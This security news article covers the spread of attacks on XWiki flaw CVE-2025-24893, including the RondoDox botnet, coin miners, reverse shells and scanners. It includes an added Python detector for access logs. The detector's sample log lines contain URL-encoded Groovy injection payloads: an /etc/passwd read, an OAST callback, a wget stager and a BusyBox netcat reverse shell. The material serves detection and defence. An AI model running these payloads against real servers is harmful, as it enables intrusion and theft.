
Botnets, Miners, and Reverse Shells: XWiki CVE-2025-24893 Becomes a Playground for Attackers

When VulnCheck first reported active exploitation of CVE-2025-24893 in late October, the attacks appeared to stem from a small number of opportunistic actors abusing exposed XWiki servers. Two weeks later, that picture has changed dramatically. According to new Canary Intelligence data from VulnCheck, exploitation has spread across the internet, attracting everything from crypto-miners and botnets to custom-built scanning tools and manual intrusion attempts.


From Niche Exploit to Global Frenzy


The timeline is swift and telling. On October 28, VulnCheck researchers published their first warning. By October 30, the vulnerability was added to CISA’s Known Exploited Vulnerabilities (KEV) catalog. Within days, traffic targeting the flaw spiked sharply as attackers integrated the exploit into automated toolkits.


“The actor set is diverse,” VulnCheck noted. “We’re seeing everything from botnets and coin-miners to custom tooling and bespoke scanners.” That diversity makes defense considerably harder, especially for organizations that do not realize their XWiki instances are reachable from the internet.


RondoDox Leads the Charge


One of the first large-scale adopters of the exploit is the RondoDox botnet, which began weaponizing the flaw on November 3. Its activity was easy to attribute: predictable payload naming (such as rondo.<value>.sh), distinctive HTTP headers, and previously known payload servers. Once executed, RondoDox-linked payloads often dropped secondary scripts that fetched coin miners or additional malware components.


While RondoDox has dominated early activity, it’s far from alone. VulnCheck documented a surge in payloads fetched from various servers around the world—including Ireland, Singapore, and the U.S.—many of which delivered obfuscated code designed to mine cryptocurrency or establish persistent access.


Reverse Shells and “Hands-on-Keyboard” Intrusions


Perhaps more worrying than the miners are the attempts to establish reverse shells, a classic sign of deeper, interactive intrusion. On October 31, an AWS-hosted IP tried to make the targeted server open a shell back to that same address using the BusyBox networking binary, behavior consistent with a human operator rather than a bot. By November 11, other hosts were using compromised QNAP and DrayTek systems to pivot and launch shell commands toward remote servers, suggesting that some infected machines were being repurposed as springboards for further intrusion.


Scanners, Probes, and the Noise Before the Storm


Meanwhile, the broader internet has erupted with automated scanning. VulnCheck observed large volumes of traffic from Nuclei-based probes and lesser-known application security testing tools hitting /xwiki/bin/get/Main/SolrSearch endpoints. While some of these probes are exploratory, others carry proof-of-concept payloads that read and leak sensitive files such as /etc/passwd. One captured payload even used OAST (Out-of-Band Application Security Testing) callbacks, in which the injected code reaches out to an attacker-controlled domain to confirm execution even when the HTTP response shows nothing, indicating more sophisticated reconnaissance.
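Detection logic for the traffic described in the last three sections, as an added example that is not part of the article and is not VulnCheck's or XWiki's code: it sweeps constructed Apache/Nginx combined-format access-log lines for requests to the SolrSearch endpoint and tags each decoded query with the indicators the article names (a /etc/passwd read, a BusyBox reverse shell, a rondo.<value>.sh fetch, an OAST callback domain). The Groovy macro markers it looks for are taken from the public advisory for CVE-2025-24893 rather than from this article, and the OAST domain list, the user-agent strings and the sample log lines are constructed assumptions.

```python
"""Sweep access logs for CVE-2025-24893 exploitation attempts.

Added example; not code from the article, VulnCheck or XWiki. Labelled
assumptions: sample log lines are constructed; Groovy macro markers follow the
public advisory, not this article; OAST domains are a partial list.
"""
import re
from collections import Counter
from dataclasses import dataclass
from urllib.parse import unquote_plus, urlsplit

# Combined log format: ip ident user [ts] "METHOD target PROTO" status bytes "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# Endpoint named in the article; the context path before /bin varies per deployment.
SOLR_PATH_RE = re.compile(r"/bin/get/Main/SolrSearch$")

# Indicators matched against the fully URL-decoded query string (dict order = report order).
INDICATORS = {
    "groovy_macro": re.compile(r"\{\{\s*(groovy|async)\b", re.I),   # advisory markers (assumption)
    "file_read": re.compile(r"/etc/(passwd|shadow)\b"),
    "reverse_shell": re.compile(r"\b(busybox\s+)?nc\b[^|;]*-e\b|/dev/tcp/", re.I),
    "rondodox_script": re.compile(r"\brondo\.[^/\s]+\.sh\b", re.I),  # rondo.<value>.sh
    "oast_callback": re.compile(                                      # partial list (assumption)
        r"\b[\w.-]+\.(oast\.(fun|pro|live|site|online|me)|oastify\.com|"
        r"interact\.sh|burpcollaborator\.net)\b", re.I),
}


@dataclass
class Finding:
    ip: str
    timestamp: str
    status: str
    user_agent: str
    indicators: list
    decoded_query: str


def fully_decode(s: str, rounds: int = 3) -> str:
    """Undo nested percent-encoding; some scanners double-encode the macro braces."""
    for _ in range(rounds):
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    return s


def classify_request(line: str):
    """Return a Finding for a suspicious SolrSearch request, else None."""
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return None
    parts = urlsplit(m["target"])
    if not SOLR_PATH_RE.search(unquote_plus(parts.path)):
        return None
    decoded = fully_decode(parts.query)
    hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
    return Finding(m["ip"], m["ts"], m["status"], m["ua"], hits, decoded) if hits else None


def sweep(lines) -> list:
    """Classify every line, dropping benign and unrelated requests."""
    return [f for f in map(classify_request, lines) if f is not None]


def indicator_counts(findings) -> Counter:
    return Counter(i for f in findings for i in f.indicators)


# Constructed sample lines using documentation IP ranges; not real traffic.
_G = "%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D"  # {{async async=false}}{{groovy}}
_E = "%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D"              # {{/groovy}}{{/async}}
_NUCLEI = "Mozilla/5.0 (compatible; Nuclei - Open-source project (github.com/projectdiscovery/nuclei))"
SAMPLE_LOG = [
    # legitimate search
    '203.0.113.5 - - [03/Nov/2025:14:02:11 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=kubernetes HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    # PoC-style probe reading /etc/passwd
    f'198.51.100.23 - - [03/Nov/2025:14:05:40 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text={_G}println%28new%20File%28%22%2Fetc%2Fpasswd%22%29.text%29{_E} HTTP/1.1" 200 2210 "-" "{_NUCLEI}"',
    # out-of-band callback to confirm blind execution
    f'198.51.100.23 - - [03/Nov/2025:14:05:41 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text={_G}%22curl%20http%3A%2F%2Fc7h2k9q1.oast.fun%22.execute%28%29{_E} HTTP/1.1" 200 1800 "-" "{_NUCLEI}"',
    # stager fetching a rondo.<value>.sh script
    f'203.0.113.77 - - [03/Nov/2025:15:12:03 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text={_G}%22wget%20http%3A%2F%2F203.0.113.10%2Frondo.x86.sh%20-O%20%2Ftmp%2Fr%22.execute%28%29{_E} HTTP/1.1" 200 1800 "-" "Mozilla/5.0"',
    # BusyBox reverse shell back to the requesting address
    f'192.0.2.44 - - [03/Nov/2025:16:48:19 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text={_G}%22busybox%20nc%20192.0.2.44%204444%20-e%20%2Fbin%2Fsh%22.execute%28%29{_E} HTTP/1.1" 200 1800 "-" "curl/8.5.0"',
    # unrelated page, ignored
    '203.0.113.5 - - [03/Nov/2025:16:50:00 +0000] "GET /xwiki/bin/view/Main/ HTTP/1.1" 200 9300 "-" "Mozilla/5.0"',
    # double-encoded macro markers, caught by fully_decode
    '198.51.100.90 - - [03/Nov/2025:17:01:27 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%257B%257Bgroovy%257D%257Dprintln%2528%2522ok%2522%2529%257B%257B%252Fgroovy%257D%257D HTTP/1.1" 200 1800 "-" "python-requests/2.32"',
]

if __name__ == "__main__":
    for f in sweep(SAMPLE_LOG):
        print(f"{f.timestamp}  {f.ip:<14} {','.join(f.indicators):<30} ua={f.user_agent[:40]}")
    print(dict(indicator_counts(sweep(SAMPLE_LOG))))
```

Point it at real logs with sweep(open("/var/log/nginx/access.log")). Two caveats: parameters sent in a POST body never reach a standard access log, so pair this with request-body capture or WAF logging for coverage; and the indicator list is deliberately narrow, so a SolrSearch request whose decoded text parameter contains {{ deserves a look even when no other indicator fires.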


The Defense Gap


The pattern is familiar: exploitation moves faster than visibility. By the time a vulnerability reaches public catalogs like CISA KEV, attackers are already operational. “Defenders need time, and early detection is the only way to get it,” VulnCheck emphasized. That is where the company’s Canary Intelligence system comes in, providing what it describes as “early visibility before exploitation becomes widespread.”


The Bigger Picture


CVE-2025-24893 illustrates the widening gap between discovery, disclosure, and exploitation. Within just two weeks, a single vulnerability went from a targeted exploit to a free-for-all for profit-driven and opportunistic actors alike. It is a stark reminder that patching alone isn’t enough: organizations also need threat intelligence capable of identifying exploitation attempts before they become widespread.


For defenders, that may mean adopting early-warning systems like VulnCheck’s Canaries, which catch weaponization trends days before they hit mainstream visibility. For attackers, it’s just another day exploiting lag time in the global patching cycle.

